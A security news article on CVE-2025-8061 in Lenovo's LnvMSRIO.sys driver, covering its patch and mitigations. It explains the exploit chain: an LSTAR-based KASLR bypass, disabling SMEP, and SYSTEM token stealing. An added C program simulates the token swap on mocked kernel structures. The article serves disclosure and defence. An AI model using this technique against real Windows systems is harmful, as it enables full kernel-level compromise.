PoC Exploit Unveiled for Lenovo Code Execution Vulnerability Enabling Privilege Escalation

A critical vulnerability in Lenovo’s Dispatcher drivers has come under the spotlight after researchers released a proof-of-concept exploit that demonstrates privilege escalation on affected Windows systems.

Identified as CVE-2025-8061, this flaw stems from insufficient access controls in the drivers, potentially allowing local attackers to execute arbitrary code with elevated privileges.

Discovered by security firm Quarkslab, the issue affects Lenovo consumer notebooks running older driver versions, raising alarms for users who haven’t applied recent patches.

Vulnerability Breakdown

The Lenovo Dispatcher drivers, versions 3.0 and 3.1, ship on certain consumer notebooks and expose an IOCTL interface for reading and writing model-specific registers (MSRs) without proper access restrictions on who may open the device and send those requests.

This oversight, classified under CWE-782 (Exposed IOCTL with Insufficient Access Control), lets an authenticated local user drive the driver's MSR primitives from user mode: reading MSRs leaks kernel addresses, and writing them redirects the syscall entry point to attacker-controlled code, yielding code execution in kernel mode and full system compromise.

The National Vulnerability Database rates it with a CVSS 4.0 score of 7.3, citing high impacts on confidentiality, integrity, and availability, though it requires local access and high attack complexity.


Affected systems are those carrying the LnvMSRIO.sys driver up to version 3.1.0.36, which is preloaded on Lenovo laptops shipped with Windows 10 or with older Windows 11 builds on which Memory Integrity is not enabled by default.

Lenovo fixed the flaw in version 3.1.0.41, released in September 2025; Lenovo Dispatcher 3.2 and later are unaffected.

Importantly, Windows Core Isolation Memory Integrity (HVCI) blocks exploitation. It is on by default on Windows 11 Lenovo systems, which reduces real-world risk for users who keep their systems updated and have not turned the feature off.

Affected products: Lenovo Dispatcher Driver 3.0 and 3.1 (LnvMSRIO.sys up to 3.1.0.36) on consumer notebooks
Impact: local privilege escalation to kernel mode, leading to full system control
Exploit prerequisites: authenticated local user access; Core Isolation Memory Integrity disabled; a Windows build matching the PoC's hardcoded offsets (e.g., 24H2 without HVCI)
CVSS score: 7.3 (CVSS 4.0, High); no CVSS 3.1 score published

Exploitation In Action

Security researcher Luis Casvella from Quarkslab detailed the exploit in a September 2025 blog post, highlighting how attackers can leverage the driver’s MSR read primitive to leak kernel addresses like KiSystemCall64 via the LSTAR register (MSR 0xC0000082).

Leaking the LSTAR value defeats kernel ASLR, since KiSystemCall64 sits at a fixed offset from the ntoskrnl base; SMEP is then dealt with separately by clearing its CR4 bit. The PoC demonstrates token-stealing shellcode that copies the SYSTEM process token into the attacker's process.

A follow-up GitHub repository by symeonp provides a working PoC that spawns a SYSTEM shell on Windows 11 24H2. It is hardcoded for build 26100.1, so other builds require adjusting offsets such as KiSystemCall64 at 0x6b2b40, and it manipulates CR4 to disable SMEP (bit 20) so the kernel can execute the user-mapped shellcode.

The technique involves reading MSRs to locate the syscall handler and derive the kernel base, injecting shellcode that walks kernel structures such as _KPCR and _EPROCESS to perform the token swap, and restoring registers like CR4 and LSTAR afterwards so the system does not crash once the shellcode returns.
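The steps in the paragraph above, as an added C example that simulates the PoC's kernel shellcode logic in user mode. It is not code from the Quarkslab post or from the symeonp repository. The structures are constructed mocks, not real Windows layouts; real _KPCR, _KTHREAD and _EPROCESS offsets are build-specific and must come from symbols for the target build, and real ActiveProcessLinks entries point at the embedded LIST_ENTRY, so shellcode subtracts the link offset to reach the _EPROCESS. The only value taken from the page is the KiSystemCall64 offset for build 26100.1; the leaked LSTAR value and the token values are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define MSR_LSTAR            0xC0000082ULL   /* IA32_LSTAR: syscall entry, KiSystemCall64 */
#define CR4_SMEP_BIT         (1ULL << 20)    /* CR4.SMEP */
#define KISYSTEMCALL64_RVA   0x6b2b40ULL     /* offset quoted on the page for build 26100.1 */
#define SYSTEM_PID           4ULL
#define EX_FAST_REF_MASK     0xFULL          /* low 4 bits of _EX_FAST_REF hold a refcount */

/* Constructed mocks: only the fields the walk needs, as plain C pointers. */
typedef struct mock_eprocess {
    uint64_t unique_process_id;          /* _EPROCESS.UniqueProcessId */
    struct mock_eprocess *active_flink;  /* _EPROCESS.ActiveProcessLinks.Flink (points at next process here) */
    uint64_t token;                      /* _EPROCESS.Token (_EX_FAST_REF) */
} mock_eprocess;

typedef struct { mock_eprocess *apc_state_process; } mock_kthread; /* _KTHREAD.ApcState.Process */
typedef struct { mock_kthread *current_thread; } mock_kpcr;        /* _KPCR.Prcb.CurrentThread */

/* Step 1: KASLR bypass. Reading IA32_LSTAR through the driver yields the address of
 * KiSystemCall64; subtracting its RVA gives the ntoskrnl base for the offsets that follow. */
uint64_t kernel_base_from_lstar(uint64_t lstar) {
    return lstar - KISYSTEMCALL64_RVA;
}

/* Step 2: SMEP bypass. The value written back is the original CR4 with bit 20 cleared so the
 * kernel may execute user-mapped shellcode. The original value must be saved and restored
 * along with LSTAR before returning, otherwise the next syscall crashes the machine. */
uint64_t cr4_without_smep(uint64_t cr4) {
    return cr4 & ~CR4_SMEP_BIT;
}

/* Step 3: token stealing. KPCR -> current thread -> current process, then follow
 * ActiveProcessLinks until PID 4 (System) and copy its token pointer over our own. */
int steal_system_token(mock_kpcr *kpcr) {
    mock_eprocess *self = kpcr->current_thread->apc_state_process;
    mock_eprocess *p = self;
    do {
        if (p->unique_process_id == SYSTEM_PID) {
            /* Drop the fast-ref count bits so a stale refcount is not copied along. */
            self->token = p->token & ~EX_FAST_REF_MASK;
            return 1;
        }
        p = p->active_flink;
    } while (p != self);
    return 0; /* PID 4 not found: leave our token untouched rather than corrupt it */
}

/* Constructed demo: a three-entry circular process list with our process last. */
#define DEMO_SYSTEM_TOKEN 0xffffa58012345678ULL
uint64_t demo_stolen_token(void) {
    mock_eprocess sys = { SYSTEM_PID, NULL, DEMO_SYSTEM_TOKEN };
    mock_eprocess svc = { 1234ULL, NULL, 0xffffa58023456781ULL };
    mock_eprocess me  = { 5678ULL, NULL, 0xffffa58034567892ULL };
    sys.active_flink = &svc;
    svc.active_flink = &me;
    me.active_flink  = &sys;
    mock_kthread thread = { &me };
    mock_kpcr kpcr = { &thread };
    if (!steal_system_token(&kpcr))
        return 0;
    return me.token;
}

int main(void) {
    uint64_t leaked_lstar = 0xfffff8031c2b2b40ULL;   /* constructed leaked MSR value */
    uint64_t cr4 = 0x350ef8ULL;                      /* constructed CR4 with SMEP set */
    printf("MSR 0x%llx leak -> KiSystemCall64 = 0x%llx, ntoskrnl base = 0x%llx\n",
           (unsigned long long)MSR_LSTAR, (unsigned long long)leaked_lstar,
           (unsigned long long)kernel_base_from_lstar(leaked_lstar));
    printf("CR4 0x%llx -> 0x%llx with SMEP cleared\n",
           (unsigned long long)cr4, (unsigned long long)cr4_without_smep(cr4));
    printf("token after steal: 0x%llx\n", (unsigned long long)demo_stolen_token());
    return 0;
}
```

The not-found branch matters in practice: a shellcode that loops past the list head or writes a garbage pointer into Token bugchecks the box, which is exactly the outcome a red teamer wants to avoid on a customer's machine.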

Casvella's analysis notes four related bugs in the driver and stresses the BYOVD angle: because LnvMSRIO.sys is legitimately signed, it loads under Driver Signature Enforcement, so an attacker who already has administrative rights can bring it to systems that never shipped it and use it for kernel-level post-exploitation.

While no in-the-wild exploitation has been reported, the public PoC shows how little adaptation red teamers or malware authors would need to target unpatched Lenovo devices.

Lenovo urges immediate updates to Dispatcher Driver 3.1.0.41 or later via Windows Update or their support site to close the gap.

For added protection, users should verify Core Isolation in Windows Security under Device Security and turn Memory Integrity on if it is disabled; it blocks this class of kernel exploit with little overhead on modern hardware.

Organizations should inventory LnvMSRIO.sys versions across endpoints, treating anything at or below 3.1.0.36 as vulnerable, scan for known-vulnerable drivers with tools such as those from AhnLab, and monitor endpoints for unexpected processes opening the driver's device and issuing IOCTLs to it.

The disclosure timeline reveals Quarkslab’s coordinated efforts with Lenovo since June 2025, culminating in patches despite delays.

As BYOVD remains a staple in advanced threats, this incident highlights the need for vigilant driver management in enterprise environments. With the PoC now public, prompt action is essential to safeguard against privilege escalation chains in real attacks.
